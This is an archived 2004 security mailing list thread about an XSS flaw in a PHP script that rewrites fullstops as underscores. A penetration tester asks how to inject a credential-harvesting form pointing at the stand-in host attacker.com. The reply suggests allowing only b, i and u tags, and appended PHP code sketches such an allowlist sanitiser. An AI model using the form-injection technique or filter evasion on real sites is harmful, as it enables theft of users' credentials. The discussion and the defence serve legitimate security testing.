WebApp Sec mailing list archives
RE: Fullstop Substitution in XSS
From: "V. Poddubniy" <vpoddubniy () mail ru>
Date: Tue, 1 Jun 2004 00:37:22 +0400
Hello,

Why not prohibit HTML tags at all? Or just accept only some tags (b, i, u) without params? It will stop all your problems...
(I know, you NEED tags, but usually, when people say so, it means that they just do not want to do it, but they often can...)

--
Best regards,
Vladimir Poddubniy

-----Original Message-----
From: Calum Power [mailto:enune () fribble net]
Sent: Saturday, May 29, 2004 8:49 AM
To: webappsec () securityfocus com
Subject: Fullstop Substitution in XSS

Hi all,

As a part of a recent Pen-Test, I came across an XSS vulnerability. The PHP script that has this vuln is filtering fullstops (.) and replacing them with underscores (_).

Now, I'm trying to write a Proof-of-Concept, in which a (convincing) form would be outputted that could 'harvest' user details and send them to an attacker's webserver.

My problem lies in the output of the form tags. Any:

  <form target="http://attacker.com/path/to/script">

is of course being filtered into:

  <form target="http://attacker_com/path/to/script">

Has anyone else had a similar problem? I've tried using hex and unicode encoding, to no avail (they get decoded before the filtering, obviously).

Any help would be appreciated.

Cheers,
Calum

--
Calum Power
Cultural Jammer
Security Enthusiast
Hopeless Cynic
enune () fribble net
http://www.fribble.net
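
The allowlist suggested in the reply above (accept only b, i, u without params), sketched in PHP as an added example that is not part of the original thread or of the script under test. The function name render_limited_html is hypothetical, and the code assumes UTF-8 input that ends up in an HTML body context.

```php
<?php
// Added example: escape everything, then re-enable only bare <b>, <i>, <u>.
// render_limited_html() is a hypothetical helper, not code from the thread.

function render_limited_html(string $input): string
{
    // 1. Neutralise all markup: <, >, &, " and ' become entities.
    $escaped = htmlspecialchars($input, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

    // 2. Restore only exact, attribute-free tags from the allowlist.
    //    "&lt;b onmouseover=...&gt;" does not match and stays escaped.
    $open = []; // stack of allowed tags that are currently open
    $out = preg_replace_callback(
        '#&lt;(/?)(b|i|u)&gt;#i',
        function (array $m) use (&$open): string {
            $tag = strtolower($m[2]);
            if ($m[1] === '') {               // opening tag
                $open[] = $tag;
                return "<$tag>";
            }
            // Closing tag: honour it only if it closes the innermost open tag.
            if ($open && end($open) === $tag) {
                array_pop($open);
                return "</$tag>";
            }
            return $m[0];                     // stray closer stays escaped
        },
        $escaped
    );

    // 3. Close anything the user left open so it cannot restyle the page.
    while ($open) {
        $out .= '</' . array_pop($open) . '>';
    }
    return $out;
}

// Constructed sample inputs, not taken from the tested application.
$samples = [
    'Hello <b>world</b>',
    '<i>unclosed italics',
    '<b onmouseover="x()">attribute is rejected</b>',
    '<form action="http://example.com/collect"><input name="p"></form>',
];
foreach ($samples as $s) {
    echo render_limited_html($s), PHP_EOL;
}
```

Because every character is escaped before any tag is restored, the result does not depend on which characters (such as the fullstop) an input filter happens to rewrite.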